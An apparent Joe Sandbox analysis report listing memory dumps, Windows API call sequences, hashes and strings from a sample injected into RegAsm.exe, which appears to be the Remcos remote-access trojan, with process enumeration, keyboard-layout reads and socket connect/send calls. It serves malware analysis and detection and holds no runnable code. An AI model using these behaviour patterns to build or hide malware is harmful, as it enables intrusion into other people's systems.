                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                            • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                            • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                            • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                            • CloseHandle.KERNEL32(?), ref: 00405140
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                            • String ID: KeepAlive | Disabled
                            • API String ID: 2993684571-305739064
                            • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                            • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                            • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                            • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                            APIs
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                            • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                            • Sleep.KERNEL32(00002710), ref: 0041AE98
                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: PlaySound$HandleLocalModuleSleepTime
                            • String ID: Alarm triggered
                            • API String ID: 614609389-2816303416
                            • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                            • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                            • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                            • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                            APIs
                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                            • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                            Strings
                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                            • API String ID: 3024135584-2418719853
                            • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                            • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                            • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                            • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                            • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                            • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                            • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                            • _free.LIBCMT ref: 0044943D
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 00449609
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID:
                            • API String ID: 1286116820-0
                            • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                            • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                            • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                            • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                            APIs
                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                              • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                            • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                              • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                              • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                            • String ID:
                            • API String ID: 2180151492-0
                            • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                            • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                            • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                            • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                            • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                            • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                            • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                            • __alloca_probe_16.LIBCMT ref: 00451231
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                            • __freea.LIBCMT ref: 0045129D
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                            • String ID:
                            • API String ID: 313313983-0
                            • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                            • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                            • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                            • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                            • _free.LIBCMT ref: 100071B8
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                            • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                            • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                            • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                            • _free.LIBCMT ref: 0044F43F
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                            • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                            • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                            • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                            • _free.LIBCMT ref: 10005BB4
                            • _free.LIBCMT ref: 10005BDB
                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                            • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                            • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                            • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                            APIs
                            • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                            • _free.LIBCMT ref: 00448353
                            • _free.LIBCMT ref: 0044837A
                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                            • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                            • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                            • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                            APIs
                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                            • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                            • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                            • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseHandleOpen$FileImageName
                            • String ID:
                            • API String ID: 2951400881-0
                            • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                            • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                            • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                            • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                            • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                            • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$lstrcat
                            • String ID:
                            • API String ID: 493641738-0
                            • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                            • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                            • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                            • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                            APIs
                            • _free.LIBCMT ref: 100091D0
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 100091E2
                            • _free.LIBCMT ref: 100091F4
                            • _free.LIBCMT ref: 10009206
                            • _free.LIBCMT ref: 10009218
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                            APIs
                            • _free.LIBCMT ref: 00450A54
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 00450A66
                            • _free.LIBCMT ref: 00450A78
                            • _free.LIBCMT ref: 00450A8A
                            • _free.LIBCMT ref: 00450A9C
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                            • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                            • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                            • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                            APIs
                            • _free.LIBCMT ref: 00444106
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 00444118
                            • _free.LIBCMT ref: 0044412B
                            • _free.LIBCMT ref: 0044413C
                            • _free.LIBCMT ref: 0044414D
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                            • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                            • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                            • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                            APIs
                            • _strpbrk.LIBCMT ref: 0044E7B8
                            • _free.LIBCMT ref: 0044E8D5
                              • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                              • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                              • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                            • String ID: *?$.
                            • API String ID: 2812119850-3972193922
                            • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                            • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                            • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                            • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                            APIs
                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                              • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,020F4950,00000010), ref: 004048E0
                              • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
